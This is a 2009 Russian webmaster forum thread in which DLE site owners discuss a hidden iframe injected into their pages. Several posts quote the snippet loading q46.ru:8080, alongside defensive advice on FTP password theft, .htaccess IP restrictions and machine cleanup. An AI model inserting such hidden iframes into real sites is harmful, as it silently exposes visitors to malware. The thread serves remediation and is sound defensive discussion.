Нет доступа на сайт

[zimka 1]

кстати не факт что вот это <body><iframe src="http://q46.ru:8080/index.php" width=119 height=100 style="visibility: hidden"></iframe> появилось из-за крякнутого FTP-менеджер или еще каких нибудь программ....была у меня такая трабла ломанули хостера каким то образом и все сайты которые были на серваке все были в этих iframe ...=)

Изменено 27 июля 2009 пользователем zimka

[webturist 6]

+ Защитите админку с помощью .htaccess

Всмысле? 0_O

WWW.ZEOS.IN

<Files admin.php>

deny from all

allow from 000.000.000.000

</Files>

Вместо нулей вписать свой IP.

кстати не факт что вот это <body><iframe src="http://q46.ru:8080/index.php" width=119 height=100 style="visibility: hidden"></iframe> появилось из-за крякнутого FTP-менеджер или еще каких нибудь программ....была у меня такая трабла ломанули хостера каким то образом и все сайты которые были на серваке все были в этих iframe ...=)

Что за хостер такой веселый?

[WWW.ZEOS.IN 1 161]

webturist, это не выход

Например если модераторы есть на сайте, то тут надо будет прописывать всем IP адреса

В адмминке DLE и так можно сделать запрет на все IP кроме своего. (это стандартная функция, так что ничего прописывать не надо)

Изменено 27 июля 2009 пользователем WWW.ZEOS.IN

[zimka 1]

Вообще хостиг http://multihost.ru/ не плохой, за 2 года ни каких нареканий.... работает четко стабильно вот одна трабла была с этими кодами, но они сами и решили ее восстановили полный бекап сервака и все)

[webturist 6]

webturist, это не выход

Например если модераторы есть на сайте, то тут надо будет прописывать всем IP адреса

В адмминке DLE и так можно сделать запрет на все IP кроме своего. (это стандартная функция, так что ничего прописывать не надо)

Я всем прописываю, апач он и в африке апач.

[zimka 1]

кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту?

[webturist 6]

Вообще хостиг http://multihost.ru/ не плохой, за 2 года ни каких нареканий.... работает четко стабильно вот одна трабла была с этими кодами, но они сами и решили ее восстановили полный бекап сервака и все)

Нет уж спасибо, если такая вещь имела место - то он уже ненадежный.

кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту?

Заходить после смены по ФТП и менять в .htaccess

Не очень конечно, но надежно.

[WWW.ZEOS.IN 1 161]

Я всем прописываю, апач он и в африке апач.

Знаю очень многих людей, которые подрабатывают модераторами и еще по основной работе ездят в командировки в разные города и страны. Так что, им постоянно IP менять? Нее, это не выход

кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту?

Тогда это точно не выход Изменено 27 июля 2009 пользователем WWW.ZEOS.IN

[zimka 1]

Вообще хостиг http://multihost.ru/ не плохой, за 2 года ни каких нареканий.... работает четко стабильно вот одна трабла была с этими кодами, но они сами и решили ее восстановили полный бекап сервака и все)

Нет уж спасибо, если такая вещь имела место - то он уже ненадежный.

кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту?

Заходить после смены по ФТП и менять в .htaccess

Не очень конечно, но надежно.

Ну не знаю это было один раз и думаю что там админа наказали))) А по поводу IP ну его....у меня стоит роутер и он в любой момент может пере подключиться к инету я запарюсь менять IP)))

[webturist 6]

Я всем прописываю, апач он и в африке апач.

Знаю очень многих людей, которые подрабатывают модераторами и еще по основной работе ездят в командировки в разные города и страны. Так что, им постоянно IP менять? Нее, это не выход

кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту?

Тогда это точно не выход

Мнения могут быть разными. Я исхожу из безопасности, а не из удобства модераторов, ездящих в командировки.

[WWW.ZEOS.IN 1 161]

А по поводу IP ну его....у меня стоит роутер и он в любой момент может пере подключиться к инету я запарюсь менять IP)))

Попросите у провайдера статичный IP.

Я знаю уже наоборот - статичный, это стандарт, а чтобы менялся, это уже доплачивать надо

А по поводу:

Журналистам, размещающим новости на многих сайтах, вообще бы для своей работы виртуальный компьютер установить не мешало.

Солгасен 100%. Только уже новые технологии, сейчас это называется: Песочница. Супер вещь!

Бесплатная и победила рейтинги журнала ДПК

Сайт: http://www.sandboxie.com/

Поддерживает русский язык

Запускать внутри её можно хоть самый страшный троян в мире и всёравно ничё не будет, перезапустил программу и всё

Есть много альтернатив, например, Returnil, но суть одна и таже

[zimka 1]

А по поводу IP ну его....у меня стоит роутер и он в любой момент может пере подключиться к инету я запарюсь менять IP)))

Попросите у провайдера статичный IP.

Я знаю уже наоборот - статичный, это стандарт, а чтобы менялся, это уже доплачивать надо

У Вас может и так))) У Нас наоборот за то чтоб постоянный был нужно платить)))

[WWW.ZEOS.IN 1 161]

Подробнее про технологию тут: http://ru.wikipedia.org/wiki/Песочница_(безопасность)

[zimka 1]

Подробнее про технологию тут: http://ru.wikipedia.org/wiki/Песочница_(безопасность)

Че это ты продаешь свой шаблон? кстати видел у многих стоит он))

[WWW.ZEOS.IN 1 161]

Причём тут мой шаблон к этому топику?

[zimka 1]

Причём тут мой шаблон к этому топику?

Думаю этот топ уже не актуален)))

[artremkozlov 0]

Подскажите пожалуйста кто-нибудь в чем проблема :

при установке движка после "настройки конфигурации системы" нажимаю "далее" и вместо "установка успешно завершена" выдает ошибку The Error returned was: Access denied for user 'wm4760_artem'@'localhost' (using password: YES)"

[WWW.ZEOS.IN 1 161]

Не правильный логин пользователя или пароль к базе данных

[ogirok 0]

Из всего, понял, что нужно прописать IP. Но как писали выше, это не выход.

Кстати, сегодня повторилась та же проблема, что описана выше. Опять <iframe src="http://q46.ru:8080/index.php" ........

Перезалил файлы, пока сайт работает.

Пользуюсь Total Kommander. Ломаный или нет не знаю, кряков не запускал. Установил с скаченого exe-файла, работает, регистрацию не требует. Но совета послушаюсь. Переустановлю его на другой диск. Посмотрим, что будет дальше. Защита на компе Касперский Интернет Секьюрити. При входе в админку, пользуюсь виртуальной клавиатурой, что идет с Каспером или копипаст. Думаю, что трояны не просекут пароли

Изменено 28 июля 2009 пользователем ogirok

[zimka 1]

Из всего, понял, что нужно прописать IP. Но как писали выше, это не выход.

Кстати, сегодня повторилась та же проблема, что описана выше. Опять <iframe src="http://q46.ru:8080/index.php" ........

Перезалил файлы, пока сайт работает.

Пользуюсь Total Kommander. Ломаный или нет не знаю, кряков не запускал. Установил с скаченого exe-файла, работает, регистрацию не требует. Но совета послушаюсь. Переустановлю его на другой диск. Посмотрим, что будет дальше. Защита на компе Касперский Интернет Секьюрити. При входе в админку, пользуюсь виртуальной клавиатурой, что идет с Каспером или копипаст. Думаю, что трояны не просекут пароли

Пароль к FTP не нужно хранить в тотале...тоесть при каждом конекте к FTP чтоб тотал спрашивал пароль и вводить его в ручную и тогда не будет этих iframe (если конечно сам хостер не заражен что мало вероятно но все таки может )

[webturist 6]

Из всего, понял, что нужно прописать IP. Но как писали выше, это не выход.

Кстати, сегодня повторилась та же проблема, что описана выше. Опять <iframe src="http://q46.ru:8080/index.php" ........

Перезалил файлы, пока сайт работает.

Пользуюсь Total Kommander. Ломаный или нет не знаю, кряков не запускал. Установил с скаченого exe-файла, работает, регистрацию не требует. Но совета послушаюсь. Переустановлю его на другой диск. Посмотрим, что будет дальше. Защита на компе Касперский Интернет Секьюрити. При входе в админку, пользуюсь виртуальной клавиатурой, что идет с Каспером или копипаст. Думаю, что трояны не просекут пароли

1. Сюда пошли iFrame, который на сайте прописывается: newvirus@kaspersky.com

2. Пока компьютер не почистишь - пароли будут известны. Если снова прописался - значит трой работает.

3. Copy-Paste - действительно может немного затруднить перехват, но ненадолго.

Нужно придерживаться следующего порядка:

1. Сначала чистка компьютера или лучше переустановка ОС. Со всем необходимым + КИС, или КАВ + Агнитум

2. Установка ФТП-менеджера (бесплатного, типа FileZilla или лучше платного FlashFXP, (месяц демо бесплатно) стабильная версия с русским языком 3.6.0 на сайте разработчика) - в нестандартной папке. Настройка на незапоминание истории посещенных узлов и паролей.

3. Вход в панель управления хостинга и изменение пароля ФТП пользователя на сложный и длинный пароль.

4. Вход на сайт по ФТП и удаление кодов iFrame. Можно затем слить сайт себе на компьютер и прошерстить основательно, если время есть.

5. Добавление в .htaccess корня сайта следующего кода:

<Files admin.php>

deny from all

allow from 000.000.000.000

</Files>

Где admin.php - Ваш файл админки, если название изменено, соответственно изменить. Например tralivali.php :

<Files tralivali.php>

deny from all

allow from 000.000.000.000

</Files>

И где 000.000.000.000 - заменить на Ваш IP, который можно узнать здесь: 2ip.ru

6. Установите виртуальный компьютер + КИС или КАВ + Агнитум

7. Войдите на сайт через виртуальный компьютер и пройдитесь, если коды iFrame все вырезаны - то "визгов" защиты не будет. Все равно проверьте стартап системы.

8. Поменяйте пароли на все, что у Вас есть. Емайл, админка хостинга и так далее.

9. Можете наслаждаться работой отличного двигателя DataLife Engine на своем сайте без троянов.

Примечания:

1. Не забудьте отослать код iFrame.

2. IP Модераторов придется прописать в .htaccess, если Вы им доверяете. Неудобства будут если у модераторов динамические IP. Если у Вас динамический IP - после каждой его смены надо будет менять его в .htaccess

3. Всегда храните пароли вне ФТП менеджера.

4. Никакая защита не гарантирует безопасность, если не придерживаться вышеприведенных правил. Даже если их придерживаться - 100% гарантии не существует. Но факт в том, что движок DLE тут непричем.

Надеюсь эта инфа поможет тем кому это надо.

P.S. Не пользуйтесь IE.

Изменено 28 июля 2009 пользователем webturist

[lifestar 18]

webturist, ну это у вас черезчур уж...

2. Установка ФТП-менеджера (бесплатного, типа FileZilla или лучше платного FlashFXP, (месяц демо бесплатно) стабильная версия с русским языком 3.6.0 на сайте разработчика) - в нестандартной папке. Настройка на незапоминание истории посещенных узлов и паролей.

мне больше нравится Total Commander, удобный

и потом... если в компе трой, какой бы ни был у вас пароль и какой-бы программой не пользовались, пароль всё равно попадёт в чужие руки - в ftp он передаётся в незашифрованном виде

Не пользуйтесь IE

а чем тогда пользоваться?)

[zimka 1]

Ни чего подобного!! Вы все говорите про IP admina в .htaccess а если IP меняется при каждом конекте? Нужно только одно пароли не хранить в FTP менеджере и все... храните его в текстовом документе в другом месте и вводить его ручками при каждом конекте...

[КиберБулка 2]

а чем тогда пользоваться?)

Opera, лиса.

IE - Достаточно бажный, в общем как и ось для нее.

[baxus 49]

Если бы все шли в ногу со временем то заметили бы что ИЕ 8 имеет даже два режима отображения сайта. Кривой сайт - кликнул и всё ОК. Также имеется 64 разрядная версия на ОС х64

Так что не сказал бы что ИЕ бажная, то что она не идёт на поводу у пользователей не делает её плохой, да и в принципе это самый используемый браузер. По мне так один большой баг это Опера. Которая диктует свои стандарты в разрез всем, как то: Рамочки оранжевые вокруг текстареа совершенно портящие вид дизайна.